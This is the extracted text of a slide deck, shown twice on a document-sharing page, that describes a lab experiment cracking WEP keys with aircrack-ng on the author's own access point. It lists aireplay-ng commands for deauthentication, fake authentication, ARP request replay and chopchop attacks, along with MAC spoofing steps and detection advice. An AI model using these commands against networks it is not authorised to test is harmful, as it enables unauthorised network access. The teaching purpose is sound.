Wep Crack Using Aircrack-ng By Arunabh Das
This document was uploaded by user and they confirmed that they have the permission to share it. If you are author or own the copyright of this book, please report to us by using this DMCA report form. Report DMCA
Overview
Download & View Wep Crack Using Aircrack-ng By Arunabh Das as PDF for free.
More details
- Words: 2,293
- Pages: 146
WEP Crack Using aircrack-ng Arunabh Das
Content
Part 1 - Background WEP Encryption Authentication Vulnerabilities Part 2 - Attack Experiment Cracking WEP Keys Test Environment Network Topology Hardware & Software The Attack Observations Part 3 - Conclusion Problems Encountered Detection & Prevention Conclusion References
WEP Encryption Wired
Equivalent Privacy 64-bit and 128-bit (24-bit IV) Utilizes RC4 and CRC32
WEP Authentication Open
System Authentication
http://documentation.netgear.com/reference/sve/wireless/WirelessNetworkingBasics-3-08.html
WEP Authentication Shared
Key Authentication
http://documentation.netgear.com/reference/sve/wireless/WirelessNetworkingBasics-3-09.html
WEP Vulnerability Static
Keys Short IV (24-bits) Susceptible to statiscal analysis based attacks
Network Topology attacker
victim
Wireless AP
H/W and S/W requirements
ker buntu 8.04 wl4965/Atheros AR5007 b/g are: Kismet Airodump Aireplay Airjack
Victim OS: Windows XP NIC: D-Link WUA-2340 USB adaptor Software: D-Link Wireless Connection Manager
Wireless AP Linksys WRT54GL
Types of attacks using aireplay
It currently implements multiple different attacks: Attack 0: Deauthentication Attack 1: Fake Authentication Attack 2: Interactive Packet Replay Attack 3: ARP Request Replay Attack Attack 4: Korek Chopchop attack Attack 5: Fragmentation attack Attack 6: Caffe-latte attack Attack 7: Client-oriented fragmentation attack
Source - http://www.aircrack-ng.org/doku.php?id=aireplay-ng
Deauthentication
This attack is a type of “man-in-the-middle” attack which disassocate packets to one or more clients which are currently associated with paticular access pont, making the client to disconnect from the AP and connect to the cracker’s fake AP. The reasons to disassociating clients are : Generate ARP reqests, Force clients to re-authenticate Recovering a hidden ESSID
Deauthenticaton cont. Use aireplay to achieve the de-auth attack Command: aireplay-ng -0 1 -a MAC address -c MAC address ath0 -0 means deauthentication 1 is the number of deauths to send -a MAC address of te acess point -c MAC address of the client to de-auth -ath0 is the interface name
Deauthentication cont. The MAC address of the AP and the client can be get by doing sniffing using tools like wireshark The output of the command from the slid above will look like: 11:09:28 Sending DeAuth to station -- STMAC: [00:0F:B5:34:30:30] STMAC is the MAC address of the client(then the client is de-authenticated,and then the attacker will be connected with the spoofed victim’s address)
Fake authentication Fake
authentication allows the attacker to proform the two types of WEP authentication (open system and shared key) pls associate with the AP, Different from deauthentication attack, no ARP packets are generated, plus the fake authentication is only useful when the attacker need and associated MAC address in other packet injection attacks but there is currently no client is connected to the AP
Fake auhentication cont.
The actual aireplay command: aireplay-ng -1 0 -e teddy -a 00:14:6C:7E:40:80 -h 00:09:5B:EC:EE:F2 -y sharedkeyxor ath0 -1 means fake authentication 0 reassociation timing in seconds -e teddy is the wireless network name -a 00:14:6C:7E:40:80 is the access point MAC address -h 00:09:5B:EC:EE:F2 is our card MAC addresss -y sharedkeyxor is the name of file containing the PRGA xor bits. This is only used for shared key authentication. Open system authentication, which is typical, does not require this.(PRGA xor bits can be obtained from the de-auth or kork chopchop attack). ath0 is the wireless interface name
ARP Request Replay attack
The classic ARP request replay attack is the most effective way to generate new initialization vectors(IVs). The program listens for an ARP packet then retransmits it back to the access point. This, in turn, causes the access point to repeat the ARP packet with a new IV. Te program retransmits the same ARP packet over and over. However, each ARP packet repeated by the access point has a new IVs. It is all these new IVs which allow you to determine the WEP key.
ARP Request Replay attack cont.
Basic usage aireplay-ng -3 -b 00:13:10:30:24:9C -h 00:11:22:33:44:55 ath0 Where:
-3 means standard arp request replay
-b 00:13:10:30:24:9C is the access point MAC address
-h 00:11:22:33:44:55 is the source MAC address (either an associated client or from fake authentication)
ath0 is the wireless interface name
ARP Request Replay attack cont. A
output of the above command would be: Saving ARP requests in replay_arp-0219123051.cap You should also start airodumpng to capture replies. Read 11978 packets (got 7193 ARP requests), sent 3902 packets
KoreK chopchop This
attack, when successful, can decrypt a WEP data packet without knowing the key. It can even work against dynamic WEP. This attack does not recover the WEP key itself, but merely reveals the plaintext. Some AP are not vulnerable to this attack
KoreK chopchop cont.
Proform korek chopchop with aireplay aireplay-ng -4 -h 00:09:5B:EC:EE:F2 -b 00:14:6C:7E:40:80 ath0 4 means the chopchop attack -h 00:09:5B:EC:EE:F2 is the MAC address of an associated client or your card's MAC if you did fake authentication -b 00:14:6C:7E:40:80 is the access point MAC address ath0 is the wireless interface name
KoreK chopchop cont.
Sample output of the above command Read 165 packets... Size: 86, FromDS: 1, ToDS: 0 (WEP) BSSID = 00:14:6C:7E:40:80 Dest. MAC = FF:FF:FF:FF:FF:FF Source MAC = 00:40:F4:77:E5:C9 0x0000: 0842 0000 ffff ffff ffff 0014 6c7e 4080 .B..........l~@. 0x0010: 0040 f477 e5c9 603a d600 0000 5fed a222 [email protected]..`:...._.." 0x0020: e2ee aa48 8312 f59d c8c0 af5f 3dd8 a543 ...H......._=..C 0x0030: d1ca 0c9b 6aeb fad6 f394 2591 5bf4 2873 ....j.....%.[.(s 0x0040: 16d4 43fb aebb 3ea1 7101 729e 65ca 6905 ..C...>.q.r.e.i. 0x0050: cfeb 4a72 be46 ..Jr.F Use this packet ? y
Fragmentation Attack This
attack, when successful, can obtain 1500 bytes of PRGA (pseudo random generation algorithm). This attack does not recover the WEP key itself, but merely obtains the PRGA. The PRGA can then be used to generate packets with packetforge-ng which are in turn used for various injection attacks. It requires at least one data packet to be received from the access point in order to initiate the attack
Korek chopchop vs. Fragmentation Attack Fragmentition
attack obtains the full packet length of 1500 bytes xor, so any size of packet could be generated, and is sufficient to create ARP request. An is extremel fast, however, it needs ore information such as the IP address to launch.
Chopchop
attack don’t need to know any IP info. Bu t is much slower and the maximum xor its is limited .
Flow Chart for Cracking
Source – http://www.aircrack-ng.org/doku.php?id=flowchart#section_7frag_chop-chop_failed
Configuring Environment Configure Access Point
Set the encryption to WEP and generate keys using passphrase
Configuring Environment Step 2 Configure Access Point
Set the SSID and the broadcast channel.
Configuring Environment Step3 Configure Access Point
Set the Authentication type to Auto
Installation Installation of kismet step1
Installation Installation of kismet – step2
Installation Installation of kismet step3
Installation Installation of kismet step4
Installation Installation of kismet step5
Installation Installation of kismet step6
Installation Installation of kismet step7
Installation Patching of kernel Step1
Note that the 2.6.24 version of the kernel doesn’t contain the modules that we need
Installation Patching of kernel Step2
Install kernel-package libraries
Installation Patching of kernel Step3
Wait for complete installation of kernel-package libraries
Installation Patching of kernel Step4 Download the latest version of the kernel using wget
Installation Patching of kernel Step4
Installation Patching of kernel Step5
Installation Patching of kernel Step6
Installation Patching of kernel Step7
Installation Patching of kernel Step8
Installation Patching of kernel Step9
Installation Patching of kernel Step10
Installation Patching of kernel Step11
Finding a client that is connected to the AP and client’s MAC id
Installation Patching of kernel Step12
Installation Patching of kernel Step13
Installation – Patching of kernel Step12
Installation Patching of kernel Step13
Installation Patching of kernel Step14-15
Installation Patching of kernel Step16-17
Installation Patching of kernel Step18
Installation Patching of kernel Step19
Installation Patching of kernel Step20
Installation Patching of kernel Step21-23
Installation Patching of kernel Step24
Installation Patching of kernel Step25
Installation Patching of kernel Step26
Installation Patching of kernel Step27-28
Installation Patching of kernel Step29
Installation Patching of kernel Step30
Installation Patching of kernel Step31
Installation Patching of kernel Step32
Installation Patching of kernel Step33
Installation Patching of kernel Step34
Installation Patching of kernel Step35-36
Installation Patching of kernel Step37-38
Installation Patching of kernel Step39-40
Installation Patching of kernel Step41
Installation – Patching of kernel Step42
Installation – Patching of kernel Step43
Installation – Patching of kernel Step44
Installation Patching of kernel Step45
Installation Patching of kernel Step46
Installation Patching of kernel – 7
Installation Patching of kernel – 8
Installation Patching of kernel – 9
Installation Patching of kernel – Step 50
Installation Patching of kernel – Step 51
Installation Patching of kernel – Step 52
Installation Patching of kernel – Step 53
Installation Patching of kernel – Step 54
Installation Patching of kernel – Step 55
Preparatory Step1 Testing Injection
Enable card to monitor mode
Preparatory Step 2 Testing Injection
Basic test to determine if card supports injection
Preparatory – Testing Injection
Check hidden ID or check specific SSID
Preparatory Testing Injection Create 2 virtual wireless interfaces for attack test
Preparatory Step 5 Testing Injection
Reconnaisance Step 1
Reconnaisance Step 2
Reconnaisance -
Reconnaisance
Reconnaisance Step 5 -
Reconnaisance Step 6 -
Reconnaisance Step 7 -
Reconnaisance Step 8 -
Reconnaisance Step 9 -
Reconnaisance Step 9 -
Attack Without Deauth – Step1
Attack Without Deauth Step2 -
Attack Without Deauth
Attack Without Deauth
Attack Without Deauth Step5
Attack Without Deauth Step 6
Attack Without Deauth Step 7
Attack Without Deauth Step8
Attack Without Deauth Step 9
Attack Without Deauth Step 10
Attack Without Deauth Step 11
Attack Without Deauth Step 12
Attack Without Deauth Step 13
Iteration 2 – ARP Request Replay without deauthentication request
Attack Step 1
Taking down the network interface in order to change the MAC
Iteration 2 – ARP Request Replay without deauthentication request
Attack Step 2
Finding a target AP and the channel it is broadcasting on.
Iteration 2 – ARP Request Replay without deauthentication request
Attack
Finding a client that is connected to the AP and client’s MAC id
Iteration 2 – ARP Request Replay with deauthentication request
Attack Changing the attacker’s MAC id to match client’s (Spoofing)
Iteration 2 – ARP Request Replay with deauthentication request
Attack Step 5
Initiating airodump to capture packets, especially weak IVS packets
Iteration 2 – ARP Request Replay with deauthentication request
Attack Step 6
Monitoring airodump to monitor rate of capture
Iteration 2 – ARP Request Replay with deauthentication request
Attack Step 7
Initiate aireplay to inject frames
Iteration 2 – ARP Request Replay with deauthentication request
Attack Step 8
Monitoring number of ARP requests generated
Iteration 2 – ARP Request Replay with deauthentication request
Attack Step 9
Sending de-authentication frames to client
ARP Request Replay Attack Variation 3 (spoofing MAC but no deauth) Step 1
ARP Request Replay Attack Variation 3 (spoofing MAC but no deauth) Step 2
ARP Request Replay Attack Variation 3 (spoofing MAC but no deauth)
Finding a client that is connected to the AP and client’s MAC id
ARP Request Replay Attack Variation 3 (spoofing MAC but no deauth)
ARP Request Replay Attack Variation 3 (spoofing MAC but no deauth) Step 5
Initiating airodump to capture packets, especially weak IVS packets
ARP Request Replay Attack Variation 3 (spoofing MAC but no deauth) Step 6
Monitoring airodump to monitor rate of capture
ARP Request Replay Attack Variation 3 (spoofing MAC but no deauth) Step 7
Initiate aireplay to inject frames
ARP Request Replay Attack Variation 3 (spoofing MAC but no deauth) Step 8
Monitoring number of ARP requests generated
ARP Request Replay Attack Variation 3 (spoofing MAC but no deauth) Step 9
Sending de-authentication frames to client
ARP Request Replay Attack Variation 3 (spoofing MAC but no deauth) Step 10
ARP Request Replay Attack Variation 3 (spoofing MAC but no deauth) Step 11
ARP Request Replay Attack Variation 3 (spoofing MAC but no deauth) Step 12
ARP Request Replay Attack Variation 3 (spoofing MAC but no deauth) Step 13
ARP Request Replay Attack Variation 3 (spoofing MAC but no deauth) Step 14
ARP Request Replay Attack Variation 3 (spoofing MAC but no deauth) Step 15
Using airecrack to crack
ARP Request Replay Attack Variation 3 (spoofing MAC but no deauth) Step 16
Using airecrack to crack
ARP Request Replay Attack Variation 3 (spoofing MAC but no deauth) Step 17
Using airecrack to crack
ARP Request Replay Attack Variation 3 (spoofing MAC but no deauth) Step 18
Using airecrack to crack
ARP Request Replay Attack Variation 3 (spoofing MAC but no deauth) Step 19
Using airecrack to crack
ARP Request Replay Attack Variation 3 (spoofing MAC but no deauth) Step 20
Using airecrack to crack
ARP Request Replay Attack Variation 3 (spoofing MAC but no deauth) Step 21
Using airecrack to crack
ARP Request Replay Attack Variation 3 (spoofing MAC but no deauth) Step 22
Using airecrack to crack
Observations/Conclusion
WEP is weak and can be cracked easily We were able to crack WEP in x minutes WEP encrypted networks should be replaced with WPA/WPA2
Detection/Prevention When
an abnormal amount of ARP requests are being made it may be a sign that a hacker is trying to crack your WEP key Careful monitoring and logging of such an event can help administrators detect such an attack. Preventing such an attack is near impossible
References [1] “Aireplay-ng” URL: http://www.aircrack-ng.org/doku.php?id=aireplay-ng [2] “Computer Security” URL: http://en.wikipedia.org/wiki/Computer_security [3] “Exploit (computer security)” URL: http://en.wikipedia.org/wiki/Exploit_(computer_security)
Questions ?
Content
Part 1 - Background WEP Encryption Authentication Vulnerabilities Part 2 - Attack Experiment Cracking WEP Keys Test Environment Network Topology Hardware & Software The Attack Observations Part 3 - Conclusion Problems Encountered Detection & Prevention Conclusion References
WEP Encryption Wired
Equivalent Privacy 64-bit and 128-bit (24-bit IV) Utilizes RC4 and CRC32
WEP Authentication Open
System Authentication
http://documentation.netgear.com/reference/sve/wireless/WirelessNetworkingBasics-3-08.html
WEP Authentication Shared
Key Authentication
http://documentation.netgear.com/reference/sve/wireless/WirelessNetworkingBasics-3-09.html
WEP Vulnerability Static
Keys Short IV (24-bits) Susceptible to statiscal analysis based attacks
Network Topology attacker
victim
Wireless AP
H/W and S/W requirements
ker buntu 8.04 wl4965/Atheros AR5007 b/g are: Kismet Airodump Aireplay Airjack
Victim OS: Windows XP NIC: D-Link WUA-2340 USB adaptor Software: D-Link Wireless Connection Manager
Wireless AP Linksys WRT54GL
Types of attacks using aireplay
It currently implements multiple different attacks: Attack 0: Deauthentication Attack 1: Fake Authentication Attack 2: Interactive Packet Replay Attack 3: ARP Request Replay Attack Attack 4: Korek Chopchop attack Attack 5: Fragmentation attack Attack 6: Caffe-latte attack Attack 7: Client-oriented fragmentation attack
Source - http://www.aircrack-ng.org/doku.php?id=aireplay-ng
Deauthentication
This attack is a type of “man-in-the-middle” attack which disassocate packets to one or more clients which are currently associated with paticular access pont, making the client to disconnect from the AP and connect to the cracker’s fake AP. The reasons to disassociating clients are : Generate ARP reqests, Force clients to re-authenticate Recovering a hidden ESSID
Deauthenticaton cont. Use aireplay to achieve the de-auth attack Command: aireplay-ng -0 1 -a MAC address -c MAC address ath0 -0 means deauthentication 1 is the number of deauths to send -a MAC address of te acess point -c MAC address of the client to de-auth -ath0 is the interface name
Deauthentication cont. The MAC address of the AP and the client can be get by doing sniffing using tools like wireshark The output of the command from the slid above will look like: 11:09:28 Sending DeAuth to station -- STMAC: [00:0F:B5:34:30:30] STMAC is the MAC address of the client(then the client is de-authenticated,and then the attacker will be connected with the spoofed victim’s address)
Fake authentication Fake
authentication allows the attacker to proform the two types of WEP authentication (open system and shared key) pls associate with the AP, Different from deauthentication attack, no ARP packets are generated, plus the fake authentication is only useful when the attacker need and associated MAC address in other packet injection attacks but there is currently no client is connected to the AP
Fake auhentication cont.
The actual aireplay command: aireplay-ng -1 0 -e teddy -a 00:14:6C:7E:40:80 -h 00:09:5B:EC:EE:F2 -y sharedkeyxor ath0 -1 means fake authentication 0 reassociation timing in seconds -e teddy is the wireless network name -a 00:14:6C:7E:40:80 is the access point MAC address -h 00:09:5B:EC:EE:F2 is our card MAC addresss -y sharedkeyxor is the name of file containing the PRGA xor bits. This is only used for shared key authentication. Open system authentication, which is typical, does not require this.(PRGA xor bits can be obtained from the de-auth or kork chopchop attack). ath0 is the wireless interface name
ARP Request Replay attack
The classic ARP request replay attack is the most effective way to generate new initialization vectors(IVs). The program listens for an ARP packet then retransmits it back to the access point. This, in turn, causes the access point to repeat the ARP packet with a new IV. Te program retransmits the same ARP packet over and over. However, each ARP packet repeated by the access point has a new IVs. It is all these new IVs which allow you to determine the WEP key.
ARP Request Replay attack cont.
Basic usage aireplay-ng -3 -b 00:13:10:30:24:9C -h 00:11:22:33:44:55 ath0 Where:
-3 means standard arp request replay
-b 00:13:10:30:24:9C is the access point MAC address
-h 00:11:22:33:44:55 is the source MAC address (either an associated client or from fake authentication)
ath0 is the wireless interface name
ARP Request Replay attack cont. A
output of the above command would be: Saving ARP requests in replay_arp-0219123051.cap You should also start airodumpng to capture replies. Read 11978 packets (got 7193 ARP requests), sent 3902 packets
KoreK chopchop This
attack, when successful, can decrypt a WEP data packet without knowing the key. It can even work against dynamic WEP. This attack does not recover the WEP key itself, but merely reveals the plaintext. Some AP are not vulnerable to this attack
KoreK chopchop cont.
Proform korek chopchop with aireplay aireplay-ng -4 -h 00:09:5B:EC:EE:F2 -b 00:14:6C:7E:40:80 ath0 4 means the chopchop attack -h 00:09:5B:EC:EE:F2 is the MAC address of an associated client or your card's MAC if you did fake authentication -b 00:14:6C:7E:40:80 is the access point MAC address ath0 is the wireless interface name
KoreK chopchop cont.
Sample output of the above command Read 165 packets... Size: 86, FromDS: 1, ToDS: 0 (WEP) BSSID = 00:14:6C:7E:40:80 Dest. MAC = FF:FF:FF:FF:FF:FF Source MAC = 00:40:F4:77:E5:C9 0x0000: 0842 0000 ffff ffff ffff 0014 6c7e 4080 .B..........l~@. 0x0010: 0040 f477 e5c9 603a d600 0000 5fed a222 [email protected]..`:...._.." 0x0020: e2ee aa48 8312 f59d c8c0 af5f 3dd8 a543 ...H......._=..C 0x0030: d1ca 0c9b 6aeb fad6 f394 2591 5bf4 2873 ....j.....%.[.(s 0x0040: 16d4 43fb aebb 3ea1 7101 729e 65ca 6905 ..C...>.q.r.e.i. 0x0050: cfeb 4a72 be46 ..Jr.F Use this packet ? y
Fragmentation Attack This
attack, when successful, can obtain 1500 bytes of PRGA (pseudo random generation algorithm). This attack does not recover the WEP key itself, but merely obtains the PRGA. The PRGA can then be used to generate packets with packetforge-ng which are in turn used for various injection attacks. It requires at least one data packet to be received from the access point in order to initiate the attack
Korek chopchop vs. Fragmentation Attack Fragmentition
attack obtains the full packet length of 1500 bytes xor, so any size of packet could be generated, and is sufficient to create ARP request. An is extremel fast, however, it needs ore information such as the IP address to launch.
Chopchop
attack don’t need to know any IP info. Bu t is much slower and the maximum xor its is limited .
Flow Chart for Cracking
Source – http://www.aircrack-ng.org/doku.php?id=flowchart#section_7frag_chop-chop_failed
Configuring Environment Configure Access Point
Set the encryption to WEP and generate keys using passphrase
Configuring Environment Step 2 Configure Access Point
Set the SSID and the broadcast channel.
Configuring Environment Step3 Configure Access Point
Set the Authentication type to Auto
Installation Installation of kismet step1
Installation Installation of kismet – step2
Installation Installation of kismet step3
Installation Installation of kismet step4
Installation Installation of kismet step5
Installation Installation of kismet step6
Installation Installation of kismet step7
Installation Patching of kernel Step1
Note that the 2.6.24 version of the kernel doesn’t contain the modules that we need
Installation Patching of kernel Step2
Install kernel-package libraries
Installation Patching of kernel Step3
Wait for complete installation of kernel-package libraries
Installation Patching of kernel Step4 Download the latest version of the kernel using wget
Installation Patching of kernel Step4
Installation Patching of kernel Step5
Installation Patching of kernel Step6
Installation Patching of kernel Step7
Installation Patching of kernel Step8
Installation Patching of kernel Step9
Installation Patching of kernel Step10
Installation Patching of kernel Step11
Finding a client that is connected to the AP and client’s MAC id
Installation Patching of kernel Step12
Installation Patching of kernel Step13
Installation – Patching of kernel Step12
Installation Patching of kernel Step13
Installation Patching of kernel Step14-15
Installation Patching of kernel Step16-17
Installation Patching of kernel Step18
Installation Patching of kernel Step19
Installation Patching of kernel Step20
Installation Patching of kernel Step21-23
Installation Patching of kernel Step24
Installation Patching of kernel Step25
Installation Patching of kernel Step26
Installation Patching of kernel Step27-28
Installation Patching of kernel Step29
Installation Patching of kernel Step30
Installation Patching of kernel Step31
Installation Patching of kernel Step32
Installation Patching of kernel Step33
Installation Patching of kernel Step34
Installation Patching of kernel Step35-36
Installation Patching of kernel Step37-38
Installation Patching of kernel Step39-40
Installation Patching of kernel Step41
Installation – Patching of kernel Step42
Installation – Patching of kernel Step43
Installation – Patching of kernel Step44
Installation Patching of kernel Step45
Installation Patching of kernel Step46
Installation Patching of kernel – 7
Installation Patching of kernel – 8
Installation Patching of kernel – 9
Installation Patching of kernel – Step 50
Installation Patching of kernel – Step 51
Installation Patching of kernel – Step 52
Installation Patching of kernel – Step 53
Installation Patching of kernel – Step 54
Installation Patching of kernel – Step 55
Preparatory Step1 Testing Injection
Enable card to monitor mode
Preparatory Step 2 Testing Injection
Basic test to determine if card supports injection
Preparatory – Testing Injection
Check hidden ID or check specific SSID
Preparatory Testing Injection Create 2 virtual wireless interfaces for attack test
Preparatory Step 5 Testing Injection
Reconnaisance Step 1
Reconnaisance Step 2
Reconnaisance -
Reconnaisance
Reconnaisance Step 5 -
Reconnaisance Step 6 -
Reconnaisance Step 7 -
Reconnaisance Step 8 -
Reconnaisance Step 9 -
Reconnaisance Step 9 -
Attack Without Deauth – Step1
Attack Without Deauth Step2 -
Attack Without Deauth
Attack Without Deauth
Attack Without Deauth Step5
Attack Without Deauth Step 6
Attack Without Deauth Step 7
Attack Without Deauth Step8
Attack Without Deauth Step 9
Attack Without Deauth Step 10
Attack Without Deauth Step 11
Attack Without Deauth Step 12
Attack Without Deauth Step 13
Iteration 2 – ARP Request Replay without deauthentication request
Attack Step 1
Taking down the network interface in order to change the MAC
Iteration 2 – ARP Request Replay without deauthentication request
Attack Step 2
Finding a target AP and the channel it is broadcasting on.
Iteration 2 – ARP Request Replay without deauthentication request
Attack
Finding a client that is connected to the AP and client’s MAC id
Iteration 2 – ARP Request Replay with deauthentication request
Attack Changing the attacker’s MAC id to match client’s (Spoofing)
Iteration 2 – ARP Request Replay with deauthentication request
Attack Step 5
Initiating airodump to capture packets, especially weak IVS packets
Iteration 2 – ARP Request Replay with deauthentication request
Attack Step 6
Monitoring airodump to monitor rate of capture
Iteration 2 – ARP Request Replay with deauthentication request
Attack Step 7
Initiate aireplay to inject frames
Iteration 2 – ARP Request Replay with deauthentication request
Attack Step 8
Monitoring number of ARP requests generated
Iteration 2 – ARP Request Replay with deauthentication request
Attack Step 9
Sending de-authentication frames to client
ARP Request Replay Attack Variation 3 (spoofing MAC but no deauth) Step 1
ARP Request Replay Attack Variation 3 (spoofing MAC but no deauth) Step 2
ARP Request Replay Attack Variation 3 (spoofing MAC but no deauth)
Finding a client that is connected to the AP and client’s MAC id
ARP Request Replay Attack Variation 3 (spoofing MAC but no deauth)
ARP Request Replay Attack Variation 3 (spoofing MAC but no deauth) Step 5
Initiating airodump to capture packets, especially weak IVS packets
ARP Request Replay Attack Variation 3 (spoofing MAC but no deauth) Step 6
Monitoring airodump to monitor rate of capture
ARP Request Replay Attack Variation 3 (spoofing MAC but no deauth) Step 7
Initiate aireplay to inject frames
ARP Request Replay Attack Variation 3 (spoofing MAC but no deauth) Step 8
Monitoring number of ARP requests generated
ARP Request Replay Attack Variation 3 (spoofing MAC but no deauth) Step 9
Sending de-authentication frames to client
ARP Request Replay Attack Variation 3 (spoofing MAC but no deauth) Step 10
ARP Request Replay Attack Variation 3 (spoofing MAC but no deauth) Step 11
ARP Request Replay Attack Variation 3 (spoofing MAC but no deauth) Step 12
ARP Request Replay Attack Variation 3 (spoofing MAC but no deauth) Step 13
ARP Request Replay Attack Variation 3 (spoofing MAC but no deauth) Step 14
ARP Request Replay Attack Variation 3 (spoofing MAC but no deauth) Step 15
Using airecrack to crack
ARP Request Replay Attack Variation 3 (spoofing MAC but no deauth) Step 16
Using airecrack to crack
ARP Request Replay Attack Variation 3 (spoofing MAC but no deauth) Step 17
Using airecrack to crack
ARP Request Replay Attack Variation 3 (spoofing MAC but no deauth) Step 18
Using airecrack to crack
ARP Request Replay Attack Variation 3 (spoofing MAC but no deauth) Step 19
Using airecrack to crack
ARP Request Replay Attack Variation 3 (spoofing MAC but no deauth) Step 20
Using airecrack to crack
ARP Request Replay Attack Variation 3 (spoofing MAC but no deauth) Step 21
Using airecrack to crack
ARP Request Replay Attack Variation 3 (spoofing MAC but no deauth) Step 22
Using airecrack to crack
Observations/Conclusion
WEP is weak and can be cracked easily We were able to crack WEP in x minutes WEP encrypted networks should be replaced with WPA/WPA2
Detection/Prevention When
an abnormal amount of ARP requests are being made it may be a sign that a hacker is trying to crack your WEP key Careful monitoring and logging of such an event can help administrators detect such an attack. Preventing such an attack is near impossible
References [1] “Aireplay-ng” URL: http://www.aircrack-ng.org/doku.php?id=aireplay-ng [2] “Computer Security” URL: http://en.wikipedia.org/wiki/Computer_security [3] “Exploit (computer security)” URL: http://en.wikipedia.org/wiki/Exploit_(computer_security)
Questions ?
Related Documents
Wep Crack Using Aircrack-ng By Arunabh Das
April 2020 10
Crack Wep
May 2020 9
Crack Cle Wep
October 2019 22
Crack Wep In 365s
November 2019 18
Tutorial Crack Cle Wep
October 2019 31
How To Crack Wep Password.docx
December 2019 16More Documents from "bongsenebu"
Condensed Installation Of Globus Toolkit 4.0.2 On Ubuntu 8.06 Lts
December 2019 12
Howtoguideforinstallationofglobustoolkit4.2 On Ubuntu 8.06 Lts
December 2019 9
Wep Crack Using Aircrack-ng By Arunabh Das
April 2020 10
Gt4 Post Installation - A Tutorial By Arunabh Das
April 2020 5